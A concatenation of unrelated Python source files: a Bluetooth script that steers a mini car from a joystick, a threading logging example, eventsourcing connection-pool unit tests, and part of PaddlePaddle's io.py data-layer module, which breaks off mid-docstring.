self.con_device.char_write_handle(handle, bytearray(value, "utf-8"))
def device_bond(self):
self.con_device.bond()
def device_subscribe(self, uuid_full, callback):
self.con_device.subscribe(uuid_full, callback)
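# Minimal usage sketch for the two wrapper classes above (illustrative only;
# "Some BLE Device" is a placeholder name, "ff10" mirrors the short UUID used
# in main() below):
#
#   adapter = BLEAdapter()
#   address = adapter.get_device_address("Some BLE Device")
#   device = RemoteBLEDevice(adapter.connect_device(address))
#   uuid_full, handle = device.get_uuid_and_handle("ff10")
#   print device.read_value(uuid_full)
#   device.write_value(handle, "f30b5000")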
def main():
print "BLE Adapter - start init...."
CMD = "f30b5000"
event_car = threading.Event()
event_joystick = threading.Event()
event_car_write = threading.Event()
adapter = BLEAdapter()
adapter.scan_remote_devices()
BLE_name_car = "Minicar BLE"
address_car = adapter.get_device_address(BLE_name_car)
print "Mini Car - BLE address '%s'" %address_car
BLE_name_joystick = "JoyStick BLE"
address_joystick = adapter.get_device_address(BLE_name_joystick)
print "Joy Stick - BLE address '%s'" %address_joystick
def func_car(address_car):
print "Mini Car - start init...."
adapter_car = BLEAdapter()
event_car.wait()
try:
con_car = adapter_car.connect_device(address_car)
print "Mini Car - be connected"
devices_car = RemoteBLEDevice(con_car)
devices_car.device_bond()
car_driver_uuid_short = "ff10"
car_driver_uuid_full, car_driver_handle = devices_car.get_uuid_and_handle(car_driver_uuid_short)
car_sensor_uuid_short = "ff20"
car_sensor_uuid_full, car_sensor_handle = devices_car.get_uuid_and_handle(car_sensor_uuid_short)
except :
print "Mini Car - please reboot A101 board"
while 1:
global CMD
event_car_write.wait()
try:
devices_car.write_value(car_driver_handle, CMD)
print "Mini Car - send data '%s'" %CMD
except :
print "Mini Car - please reboot A101 board"
event_car_write.clear()
def func_joystick(address_joystick):
print "Joy Stick - start init...."
adapter_joystick = BLEAdapter()
event_joystick.wait()
try:
con_JS = adapter_joystick.connect_device(address_joystick)
print "Joy Stick - be connected"
devices_JS = RemoteBLEDevice(con_JS)
devices_JS.device_bond()
JS_notify_uuid_short = "fffa"
JS_notify_uuid_full, JS_notify_handle = devices_JS.get_uuid_and_handle(JS_notify_uuid_short)
JS_read_uuid_short = "fffb"
JS_read_uuid_full, JS_read_handle = devices_JS.get_uuid_and_handle(JS_read_uuid_short)
except :
print "Joy Stick - please reboot A101 board"
def _joystick_callback_func(handle, value):
global CMD
CMD = value.decode("utf-8")
event_car_write.set()
print "Joy Stick - get data '%s'" %CMD
devices_JS.device_subscribe(JS_notify_uuid_full, _joystick_callback_func)
print "Joy Stick - subscribe"
print "BLE Adapter - all init completed"
thread_car = threading.Thread(target=func_car, args=(address_car,))
thread_joystick = threading.Thread(target=func_joystick, args=(address_joystick,))
thread_car.setDaemon(True)
thread_car.start()
time.sleep(10)
thread_joystick.setDaemon(True)
thread_joystick.start()
time.sleep(10)
event_car.set()
time.sleep(10)
event_joystick.set()
while 1:
try :
time.sleep(2)
except KeyboardInterrupt :
print "BLE Adapter - exit"
break
except :
print "BLE Adapter - error"
continue
if __name__ == "__main__" :
print "Test to control mini car using joy stick"
main()
|
5.thread_with_logger.py
|
import logging
import threading
import time
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-10s) %(message)s',
)
def worker():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
def my_service():
logging.debug('Starting')
time.sleep(3)
logging.debug('Exiting')
t = threading.Thread(name='my_service', target=my_service)
w = threading.Thread(name='worker', target=worker)
w2 = threading.Thread(target=worker) # use default name
w.start()
w2.start()
t.start()
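# Note: the logging module serializes each handler's emit() call with a lock, so
# the three threads above produce whole, non-interleaved lines; %(threadName)-10s
# in the format string tags each record with the emitting thread's name
# ('my_service', 'worker', or a default such as 'Thread-1' for w2).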
|
test_connection_pool.py
|
from concurrent.futures import ThreadPoolExecutor, TimeoutError
from itertools import count
from threading import Event, Lock, Thread
from time import sleep, time
from typing import Any, List, Optional, Union
from unittest import TestCase
from eventsourcing.persistence import (
Connection,
ConnectionNotFromPool,
ConnectionPool,
ConnectionPoolClosed,
ConnectionPoolExhausted,
Cursor,
PersistenceError,
ProgrammingError,
ReaderBlockedByWriter,
WriterBlockedByReaders,
WriterBlockedByWriter,
)
class DummyCursor(Cursor):
def __init__(self):
self._closed = False
self._results = None
def execute(self, statement: Union[str, bytes], params: Any = None):
if self._closed:
raise PersistenceError
assert statement == "SELECT 1"
self._results = [[1]]
def fetchall(self):
if self._closed:
raise PersistenceError
if self._results is None:
raise ProgrammingError
return self._results
def fetchone(self):
if self._closed:
raise PersistenceError
if self._results is None:
raise ProgrammingError
return self._results[0]
def close(self):
self._closed = True
class DummyConnection(Connection):
def __init__(self, max_age: Optional[float] = None):
super().__init__(max_age=max_age)
self._cursors: List[DummyCursor] = []
self._closed_on_server = False
def commit(self):
if self.closed:
raise PersistenceError("Closed")
def rollback(self):
if self.closed:
raise PersistenceError("Closed")
def cursor(self):
curs = DummyCursor()
self._cursors.append(curs)
if self._closed or self._closed_on_server:
curs.close()
return curs
def _close(self):
for curs in self._cursors:
curs.close()
super()._close()
def close_on_server(self):
self._closed_on_server = True
class DummyConnectionPool(ConnectionPool):
def _create_connection(self) -> Connection:
return DummyConnection(max_age=self.max_age)
class TestConnection(TestCase):
def test_commit_rollback_close(self):
conn = DummyConnection()
self.assertFalse(conn.closed)
self.assertFalse(conn.closing)
self.assertTrue(conn.in_use.locked())
conn.commit()
conn.rollback()
conn.close()
self.assertTrue(conn.closed)
self.assertFalse(conn.closing)
with self.assertRaises(PersistenceError):
conn.commit()
with self.assertRaises(PersistenceError):
conn.rollback()
def test_max_age(self):
conn = DummyConnection(max_age=0)
sleep(0.01)
self.assertTrue(conn.closing)
self.assertFalse(conn.closed)
conn.in_use.release()
sleep(0.01)
self.assertTrue(conn.closed)
def test_close_on_server(self):
conn = DummyConnection()
conn.close_on_server()
self.assertFalse(conn.closing)
self.assertFalse(conn.closed)
with self.assertRaises(PersistenceError):
conn.cursor().execute("SELECT 1")
class TestConnectionPool(TestCase):
ProgrammingError = ProgrammingError
PersistenceError = PersistenceError
def create_pool(
self,
pool_size=1,
max_overflow=0,
max_age=None,
pre_ping=False,
mutually_exclusive_read_write=False,
):
return DummyConnectionPool(
pool_size=pool_size,
max_overflow=max_overflow,
max_age=max_age,
pre_ping=pre_ping,
mutually_exclusive_read_write=mutually_exclusive_read_write,
)
def close_connection_on_server(self, *connections):
for conn in connections:
assert isinstance(conn, DummyConnection)
conn.close_on_server()
def test_get_and_put(self):
pool = self.create_pool(pool_size=2, max_overflow=2)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 0)
conn1 = pool.get_connection()
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 0)
conn2 = pool.get_connection()
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 0)
conn3 = pool.get_connection()
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 0)
conn4 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
pool.put_connection(conn1)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn1.closed)
conn5 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
pool.put_connection(conn2)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn2.closed)
pool.put_connection(conn3)
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 2)
self.assertFalse(conn3.closed)
pool.put_connection(conn4)
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn4.closed)
pool.put_connection(conn5)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn5.closed)
# Do it all again.
conn6 = pool.get_connection()
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 1)
conn7 = pool.get_connection()
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 0)
conn8 = pool.get_connection()
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 0)
conn9 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
pool.put_connection(conn6)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn6.closed)
conn10 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
pool.put_connection(conn7)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn7.closed)
pool.put_connection(conn8)
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 2)
self.assertFalse(conn8.closed)
pool.put_connection(conn9)
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn9.closed)
pool.put_connection(conn10)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn10.closed)
def test_connection_not_from_pool(self):
pool = self.create_pool()
with self.assertRaises(ConnectionNotFromPool):
pool.put_connection(pool._create_connection())
def test_close_before_returning(self):
pool = self.create_pool()
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 0)
conn1 = pool.get_connection()
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 0)
conn1.close()
pool.put_connection(conn1)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 0)
def test_close_after_returning(self):
pool = self.create_pool()
conn1 = pool.get_connection()
pool.put_connection(conn1)
conn1.close()
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 1)
conn1 = pool.get_connection()
self.assertFalse(conn1.closed)
def test_close_on_server_after_returning_without_pre_ping(self):
pool = self.create_pool()
conn1 = pool.get_connection()
curs = conn1.cursor()
with self.assertRaises(self.ProgrammingError):
self.assertEqual(curs.fetchall(), None)
curs.execute("SELECT 1")
self.assertEqual(curs.fetchall(), [[1]])
pool.put_connection(conn1)
self.close_connection_on_server(conn1)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 1)
conn1 = pool.get_connection()
self.assertFalse(conn1.closed)
with self.assertRaises(self.PersistenceError):
conn1.cursor().execute("SELECT 1")
def test_close_on_server_after_returning_with_pre_ping(self):
pool = self.create_pool(pre_ping=True)
conn1 = pool.get_connection()
pool.put_connection(conn1)
self.close_connection_on_server(conn1)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 1)
conn2 = pool.get_connection()
self.assertFalse(conn2.closed)
curs = conn2.cursor()
curs.execute("SELECT 1")
self.assertEqual(curs.fetchall(), [[1]])
def test_max_age(self):
pool = self.create_pool(max_age=0.05)
# Timer fires after conn returned to pool.
conn1 = pool.get_connection()
self.assertFalse(conn1.closed)
self.assertFalse(conn1.closing)
pool.put_connection(conn1)
self.assertEqual(pool.num_in_pool, 1)
sleep(0.1)
self.assertTrue(conn1.closed)
# Pool returns a new connection.
conn2 = pool.get_connection()
self.assertEqual(pool.num_in_pool, 0)
self.assertFalse(conn2.closed)
self.assertFalse(conn2.closing)
self.assertNotEqual(id(conn1), id(conn2))
self.assertEqual(pool.num_in_pool, 0)
# Timer fires before conn returned to pool.
sleep(0.1)
self.assertFalse(conn2.closed)
self.assertTrue(conn2.closing)
self.assertEqual(pool.num_in_pool, 0)
pool.put_connection(conn2)
self.assertEqual(pool.num_in_pool, 0)
sleep(0.05)
        self.assertTrue(conn2.closed)
# Pool returns another new connection.
conn3 = pool.get_connection()
self.assertFalse(conn3.closed)
self.assertFalse(conn3.closing)
self.assertNotEqual(id(conn2), id(conn3))
pool.put_connection(conn3)
def test_get_with_timeout(self):
pool = self.create_pool()
# Get a connection.
conn1 = pool.get_connection()
# Check request for a second connection times out immediately.
started = time()
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
ended = time()
self.assertLess(ended - started, 0.1)
# Check request for a second connection times out after delay.
started = time()
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0.1)
ended = time()
self.assertGreater(ended - started, 0.1)
# Check request for second connection is kept waiting
# but doesn't timeout if first connection is returned.
getting_conn2 = Event()
got_conn2 = Event()
def put_conn1():
getting_conn2.wait()
sleep(0.05)
pool.put_connection(conn1)
def get_conn2():
getting_conn2.set()
pool.get_connection(timeout=0.1)
got_conn2.set()
thread1 = Thread(target=put_conn1, daemon=True)
thread2 = Thread(target=get_conn2, daemon=True)
thread1.start()
thread2.start()
self.assertTrue(got_conn2.wait(timeout=0.3))
def test_close_pool(self):
# Get three connections and return one of them.
pool = self.create_pool(pool_size=2, max_overflow=1)
conn1 = pool.get_connection()
conn2 = pool.get_connection()
conn3 = pool.get_connection()
pool.put_connection(conn1)
# Close pool.
pool.close()
# All connections are closed (returned and those in use).
self.assertTrue(conn1.closed)
self.assertTrue(conn2.closed)
self.assertTrue(conn3.closed)
# Raises error when putting connection after pool closed.
with self.assertRaises(ConnectionPoolClosed):
pool.put_connection(conn2)
with self.assertRaises(ConnectionPoolClosed):
pool.put_connection(conn3)
# Raises error when getting connection after pool closed.
with self.assertRaises(ConnectionPoolClosed):
pool.get_connection()
# Can call close() twice.
pool.close()
def test_fairness_1_0_pre_ping_false(self):
self._test_fairness(pool_size=1, max_overflow=0, pre_ping=False)
def test_fairness_1_0_pre_ping_true(self):
self._test_fairness(pool_size=1, max_overflow=0, pre_ping=True)
def test_fairness_3_2_pre_ping_false(self):
self._test_fairness(pool_size=3, max_overflow=2, pre_ping=False)
def test_fairness_3_2_pre_ping_true(self):
self._test_fairness(pool_size=3, max_overflow=2, pre_ping=True)
def _test_fairness(self, pool_size=1, max_overflow=1, pre_ping=True):
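        # Each of `num_threads` workers repeatedly gets a connection, holds it
        # for `hold_connection_for` seconds, then returns it. The per-get timeout
        # is sized so that, if the pool serves waiters roughly in FIFO order,
        # no worker should time out even with pool_size=1.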
connection_pool = self.create_pool(
pool_size=pool_size, max_overflow=max_overflow, pre_ping=pre_ping
)
num_threads = 5
num_gets = 5
hold_connection_for = 0.1
expected_wait_periods = num_threads
timeout_get_connection = expected_wait_periods * hold_connection_for * 1.5
self.counter = count()
thread_pool = ThreadPoolExecutor(max_workers=num_threads)
futures = []
wait_for = None
is_stopped = Event()
debug = False
def get_conn(
name,
has_started,
wait_for,
do_close,
):
if wait_for:
assert wait_for.wait(timeout=1)
has_started.set()
if debug:
print(name, "started")
for _ in range(num_gets):
# print(name, "getting connection")
started = time()
try:
conn = connection_pool.get_connection(
timeout=timeout_get_connection
)
except Exception as exp:
waited_for = time() - started
msg = (
f"{name} errored after {waited_for :.3f}, "
f"timeout {timeout_get_connection}"
)
print(msg, type(exp))
raise Exception(msg) from exp
else:
assert conn
if pre_ping:
assert not conn.closed
j = next(self.counter)
if debug:
waited_for = time() - started
print(
name,
"got connection",
j,
"after",
f"{waited_for :.3f}",
f"{timeout_get_connection - waited_for :.3f}",
)
assert (
connection_pool.num_in_use
<= connection_pool.pool_size + connection_pool.max_overflow
)
assert connection_pool.num_in_pool <= connection_pool.pool_size
if debug:
print("num used connections:", connection_pool.num_in_use)
if not ((j + 1) % 4) and do_close:
if debug:
print("closing connection", j, "before returning to pool")
conn.close()
sleep(hold_connection_for)
if not ((j + 3) % 4) and do_close:
if debug:
print("closing connection", j, "after returning to pool")
conn.close()
connection_pool.put_connection(conn)
# sleep(0.001)
if is_stopped.is_set():
print(name, "stopping early....")
return
# print(name, "put connection", j)
if debug:
print(name, "finished")
for k in range(num_threads):
has_started = Event()
future = thread_pool.submit(
get_conn,
name=k,
has_started=has_started,
wait_for=wait_for,
do_close=True,
)
wait_for = has_started
futures.append(future)
total_timeout = num_gets * (timeout_get_connection + hold_connection_for) * 1.5
future_wait_started = time()
for future in futures:
try:
future.result(timeout=total_timeout)
except TimeoutError as e:
is_stopped.set()
raise Exception(
f"Timed out{time() - future_wait_started}, timeout {total_timeout}"
) from e
except Exception:
is_stopped.set()
raise
def test_reader_writer(self):
self._test_reader_writer_with_mutually_exclusive_read_write()
self._test_reader_writer_without_mutually_exclusive_read_write()
def _test_reader_writer_with_mutually_exclusive_read_write(self):
pool = self.create_pool(pool_size=3, mutually_exclusive_read_write=True)
self.assertTrue(pool._mutually_exclusive_read_write)
# Get writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
self.assertIs(writer_conn.is_writer, True)
# Return writer.
pool.put_connection(writer_conn)
# Get two readers.
reader_conn1 = pool.get_connection(is_writer=False)
reader_conn2 = pool.get_connection(is_writer=False)
self.assertIs(reader_conn1.is_writer, False)
self.assertIs(reader_conn2.is_writer, False)
# Fail to get writer.
with self.assertRaises(WriterBlockedByReaders):
pool.get_connection(is_writer=True, timeout=0)
# Return readers to pool.
pool.put_connection(reader_conn1)
pool.put_connection(reader_conn2)
# Get writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
# Fail to get reader.
with self.assertRaises(ReaderBlockedByWriter):
pool.get_connection(is_writer=False, timeout=0)
# Fail to get writer.
with self.assertRaises(WriterBlockedByWriter):
pool.get_connection(is_writer=True, timeout=0)
# Return writer.
pool.put_connection(writer_conn)
# Get and put another writer.
writer_conn = pool.get_connection(is_writer=True)
pool.put_connection(writer_conn)
# Get two readers.
reader_conn1 = pool.get_connection(is_writer=False)
reader_conn2 = pool.get_connection(is_writer=False)
pool.put_connection(reader_conn1)
pool.put_connection(reader_conn2)
def _test_reader_writer_without_mutually_exclusive_read_write(self):
pool = self.create_pool(pool_size=3, mutually_exclusive_read_write=False)
self.assertFalse(pool._mutually_exclusive_read_write)
# Get writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
self.assertIs(writer_conn.is_writer, True)
# Get two readers.
reader_conn1 = pool.get_connection(is_writer=False)
reader_conn2 = pool.get_connection(is_writer=False)
self.assertIs(reader_conn1.is_writer, False)
self.assertIs(reader_conn2.is_writer, False)
# Fail to get another writer.
with self.assertRaises(WriterBlockedByWriter):
pool.get_connection(is_writer=True, timeout=0)
# Return writer.
pool.put_connection(writer_conn)
# Return readers to pool.
pool.put_connection(reader_conn1)
pool.put_connection(reader_conn2)
# Get two readers.
pool.get_connection(is_writer=False)
pool.get_connection(is_writer=False)
# Get another writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
# Fail to get another writer.
with self.assertRaises(WriterBlockedByWriter):
pool.get_connection(is_writer=True, timeout=0)
# Return writer.
pool.put_connection(writer_conn)
# Get and put another writer.
writer_conn = pool.get_connection(is_writer=True)
pool.put_connection(writer_conn)
_print = print
print_lock = Lock()
def print(*args):
with print_lock:
_print(*args)
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import multiprocessing
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
__all__ = [
'data', 'open_recordio_file', 'open_files', 'read_file', 'shuffle', 'batch',
'double_buffer', 'random_data_generator', 'py_reader', 'Preprocessor',
'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
    This function creates a global variable that serves as a data entry point
    for the network. Depending on ``append_batch_size``, a batch dimension is
    prepended to the declared shape. The global variable can be accessed by all
    the following operators in the graph.
    All the input variables of this function are passed in as local variables
    to the LayerHelper constructor.
    Args:
        name(str): The name/alias of the variable.
        shape(list): Tuple or list declaring the shape of the data.
        append_batch_size(bool): Whether to prepend a batch dimension (-1) to the shape.
        dtype(str): The data type, e.g. float32, float16, int64.
        type(VarType): The output type. By default it is LOD_TENSOR.
        lod_level(int): The LoD level. 0 means the input data is not a sequence.
        stop_gradient(bool): Whether gradients stop propagating at this variable.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
    ListenAndServ is used to create an RPC server that binds and listens
    on a specific TCP port; the server runs the sub-block when it
    receives variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
        fan_in(int): how many clients are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, sync=True):
"""
    Send variables to the server side. If ``sync`` is True, wait until the
    server side has finished running the server-side program.
    Args:
        endpoints (str): comma separated IP:PORT pairs in the order
           of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(type="send_barrier", attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, sync=True):
"""
Receive variables from server side
Args:
        endpoints (str): comma separated IP:PORT pairs in the order
           of get_vars to receive
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": get_vars},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(type="fetch_barrier", attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
        >>>                           shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
    :code:`decorate_tensor_provider()` to set a Python generator as the data
    source on the Python side. When :code:`Executor::Run()` is invoked on the
